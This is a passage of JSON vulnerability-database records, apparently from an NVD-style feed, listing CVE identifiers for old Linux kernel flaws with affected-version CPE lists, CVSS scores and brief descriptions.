"cpe:/o:linux:linux_kernel:2.4.11", "cpe:/o:linux:linux_kernel:2.4.5", "cpe:/o:linux:linux_kernel:2.6.8", "cpe:/o:linux:linux_kernel:2.5.52", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.5.8", "cpe:/o:linux:linux_kernel:2.4.20", "cpe:/o:linux:linux_kernel:2.4.14", "cpe:/o:linux:linux_kernel:2.2.25", "cpe:/o:linux:linux_kernel:2.5.18", "cpe:/o:linux:linux_kernel:2.5.30", "cpe:/o:linux:linux_kernel:2.5.19", "cpe:/o:linux:linux_kernel:2.5.66", "cpe:/o:linux:linux_kernel:2.5.16", "cpe:/o:linux:linux_kernel:2.5.25", "cpe:/o:linux:linux_kernel:2.5.37", "cpe:/o:linux:linux_kernel:2.2.21", "cpe:/o:linux:linux_kernel:2.5.13", "cpe:/o:linux:linux_kernel:2.4.26", "cpe:/o:linux:linux_kernel:2.4.23_ow2", "cpe:/o:linux:linux_kernel:2.4.25", "cpe:/o:linux:linux_kernel:2.2.1", "cpe:/o:linux:linux_kernel:2.2.18", "cpe:/o:linux:linux_kernel:2.4.8", "cpe:/o:linux:linux_kernel:2.5.31", "cpe:/o:linux:linux_kernel:2.2.14", "cpe:/o:linux:linux_kernel:2.5.20", "cpe:/o:linux:linux_kernel:2.5.5", "cpe:/o:linux:linux_kernel:2.5.44", "cpe:/o:linux:linux_kernel:2.5.38", "cpe:/o:linux:linux_kernel:2.5.4", "cpe:/o:linux:linux_kernel:2.5.49", "cpe:/o:linux:linux_kernel:2.4.7", "cpe:/o:linux:linux_kernel:2.5.2", "cpe:/o:linux:linux_kernel:2.5.1", "cpe:/o:linux:linux_kernel:2.5.48", "cpe:/o:linux:linux_kernel:2.2.17", "cpe:/o:linux:linux_kernel:2.4.2", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:2.5.15", "cpe:/o:linux:linux_kernel:2.4.22", "cpe:/o:linux:linux_kernel:2.2.15_pre20", "cpe:/o:linux:linux_kernel:2.5.60", "cpe:/o:linux:linux_kernel:2.4.18", "cpe:/o:linux:linux_kernel:2.6.6", "cpe:/o:linux:linux_kernel:2.5.35", "cpe:/o:linux:linux_kernel:2.5.39", "cpe:/o:linux:linux_kernel:2.2.23", "cpe:/o:linux:linux_kernel:2.5.56", "cpe:/o:linux:linux_kernel:2.5.63", "cpe:/o:linux:linux_kernel:2.2.4", "cpe:/o:linux:linux_kernel:2.5.3", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:2.4.16", "cpe:/o:linux:linux_kernel:2.5.62", "cpe:/o:linux:linux_kernel:2.4.4", "cpe:/o:linux:linux_kernel:2.2.3", "cpe:/o:linux:linux_kernel:2.2.16", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.4.23", "cpe:/o:linux:linux_kernel:2.5.21", "cpe:/o:linux:linux_kernel:2.2.10", "cpe:/o:linux:linux_kernel:2.5.9", "cpe:/o:linux:linux_kernel:2.4.12", "cpe:/o:linux:linux_kernel:2.5.12", "cpe:/o:linux:linux_kernel:2.2.6", "cpe:/o:linux:linux_kernel:2.5.58", "cpe:/o:linux:linux_kernel:2.5.53", "cpe:/o:linux:linux_kernel:2.5.24", "cpe:/o:linux:linux_kernel:2.6.9", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.5.17", "cpe:/o:linux:linux_kernel:2.5.61", "cpe:/o:linux:linux_kernel:2.5.23", "cpe:/o:linux:linux_kernel:2.5.42", "cpe:/o:linux:linux_kernel:2.5.45", "cpe:/o:linux:linux_kernel:2.5.40", "cpe:/o:linux:linux_kernel:2.4.13", "cpe:/o:linux:linux_kernel:2.2.9", "cpe:/o:linux:linux_kernel:2.5.43", "cpe:/o:linux:linux_kernel:2.5.0", "cpe:/o:linux:linux_kernel:2.5.68", "cpe:/o:linux:linux_kernel:2.4.0", "cpe:/o:linux:linux_kernel:2.4.28", "cpe:/o:linux:linux_kernel:2.5.29", "cpe:/o:linux:linux_kernel:2.2.2", "cpe:/o:linux:linux_kernel:2.2.11", "cpe:/o:linux:linux_kernel:2.5.59", "cpe:/o:linux:linux_kernel:2.4.6", "cpe:/o:linux:linux_kernel:2.4.10", "cpe:/o:linux:linux_kernel:2.5.57", "cpe:/o:linux:linux_kernel:2.5.33", "cpe:/o:linux:linux_kernel:2.6.7", "cpe:/o:linux:linux_kernel:2.5.14", "cpe:/o:linux:linux_kernel:2.5.7", "cpe:/o:linux:linux_kernel:2.5.51", "cpe:/o:linux:linux_kernel:2.2.0", "cpe:/o:linux:linux_kernel:2.4.19", "cpe:/o:linux:linux_kernel:2.5.34", "cpe:/o:linux:linux_kernel:2.2.19", "cpe:/o:linux:linux_kernel:2.5.11", "cpe:/o:linux:linux_kernel:2.5.65", "cpe:/o:linux:linux_kernel:2.6_test9_cvs", "cpe:/o:linux:linux_kernel:2.5.22", "cpe:/o:linux:linux_kernel:2.2.13", "cpe:/o:linux:linux_kernel:2.2.12", "cpe:/o:linux:linux_kernel:2.5.47", "cpe:/o:linux:linux_kernel:2.4.3", "cpe:/o:linux:linux_kernel:2.4.17", "cpe:/o:linux:linux_kernel:2.4.1", "cpe:/o:linux:linux_kernel:2.5.27", "cpe:/o:linux:linux_kernel:2.5.50", "cpe:/o:linux:linux_kernel:2.5.54", "cpe:/o:linux:linux_kernel:2.4.15", "cpe:/o:linux:linux_kernel:2.5.69", "cpe:/o:linux:linux_kernel:2.5.46", "cpe:/o:linux:linux_kernel:2.3.99", "cpe:/o:linux:linux_kernel:2.5.6", "cpe:/o:linux:linux_kernel:2.5.67", "cpe:/o:linux:linux_kernel:2.2.8", "cpe:/o:linux:linux_kernel:2.4.29", "cpe:/o:linux:linux_kernel:2.2.22", "cpe:/o:linux:linux_kernel:2.5.28", "cpe:/o:linux:linux_kernel:2.4.24", "cpe:/o:linux:linux_kernel:2.5.55", "cpe:/o:linux:linux_kernel:2.3.0"], "id": "CVE-2005-0504", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0504", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.2.15_pre20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test12:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.3.99:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.55:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test11:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test11:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.24_ow1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.3.99:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23_ow2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.3.99:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.3.99:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.3.99:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.69:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6_test9_cvs:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.15:pre16:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.3.99:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.3.99:pre7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:2.6.20:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23:pre9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.3.99:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:pre7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:x86:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.5.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.2.16:pre6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test10:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:50:59", "description": "arch/x86_64/lib/copy_user.S in the Linux kernel before 2.6.19 on some AMD64 systems does not erase destination memory locations after an exception during kernel memory copy, which allows local users to obtain sensitive information.", "edition": 3, "cvss3": {}, "published": "2008-06-30T22:41:00", "title": "CVE-2008-2729", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2729"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/o:red_hat:linux_kernel:2.6.0", "cpe:/o:red_hat:linux_kernel:2.6.12", "cpe:/o:red_hat:linux_kernel:2.6.7", "cpe:/o:red_hat:linux_kernel:2.6.17", "cpe:/o:red_hat:linux_kernel:2.6.13", "cpe:/o:red_hat:linux_kernel:2.6.11", "cpe:/o:red_hat:linux_kernel:2.6.14", "cpe:/o:red_hat:linux_kernel:2.6.9", "cpe:/o:red_hat:linux_kernel:2.6.6", "cpe:/o:red_hat:linux_kernel:2.6.4", "cpe:/o:red_hat:linux_kernel:2.6.16", "cpe:/o:red_hat:linux_kernel:2.6.15", "cpe:/o:red_hat:linux_kernel:2.6.10", "cpe:/o:red_hat:linux_kernel:2.6.5", "cpe:/o:red_hat:linux_kernel:2.6.2", "cpe:/o:red_hat:linux_kernel:2.6.18", "cpe:/o:red_hat:linux_kernel:2.6.8", "cpe:/o:red_hat:linux_kernel:2.6.1", "cpe:/o:red_hat:linux_kernel:2.6.3"], "id": "CVE-2008-2729", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2729", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:red_hat:linux_kernel:2.6.13:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.14:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.17:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.16:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.18:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.15:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:red_hat:linux_kernel:2.6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:50:58", "description": "The asn1 implementation in (a) the Linux kernel 2.4 before 2.4.36.6 and 2.6 before 2.6.25.5, as used in the cifs and ip_nat_snmp_basic modules; and (b) the gxsnmp package; does not properly validate length values during decoding of ASN.1 BER data, which allows remote attackers to cause a denial of service (crash) or execute arbitrary code via (1) a length greater than the working buffer, which can lead to an unspecified overflow; (2) an oid length of zero, which can lead to an off-by-one error; or (3) an indefinite length for a primitive encoding.", "edition": 3, "cvss3": {}, "published": "2008-06-10T00:32:00", "title": "CVE-2008-1673", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1673"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.20.9", "cpe:/o:linux:linux_kernel:2.6.12.22", "cpe:/o:linux:linux_kernel:2.6.18.1", "cpe:/o:linux:linux_kernel:2.4.27", "cpe:/o:linux:linux_kernel:2.6.22.3", "cpe:/o:linux:linux_kernel:2.6.19.1", "cpe:/o:linux:linux_kernel:2.6.15.2", "cpe:/o:linux:linux_kernel:2.6.22.15", "cpe:/o:linux:linux_kernel:2.4.9", "cpe:/o:linux:linux_kernel:2.6.23.1", "cpe:/o:linux:linux_kernel:2.6.21", "cpe:/o:linux:linux_kernel:2.6.14.4", "cpe:/o:linux:linux_kernel:2.6.22.16", "cpe:/o:linux:linux_kernel:2.4.21", "cpe:/o:linux:linux_kernel:2.6.16.9", "cpe:/o:linux:linux_kernel:2.6.11.7", "cpe:/o:linux:linux_kernel:2.6.11.8", "cpe:/o:linux:linux_kernel:2.6.25.3", "cpe:/o:linux:linux_kernel:2.4.24_ow1", "cpe:/o:linux:linux_kernel:2.6.12.3", "cpe:/o:linux:linux_kernel:2.6.14.1", "cpe:/o:linux:linux_kernel:2.4.11", "cpe:/o:debian:debian_linux:4.0", "cpe:/o:linux:linux_kernel:2.4.5", "cpe:/o:linux:linux_kernel:2.4.33.3", 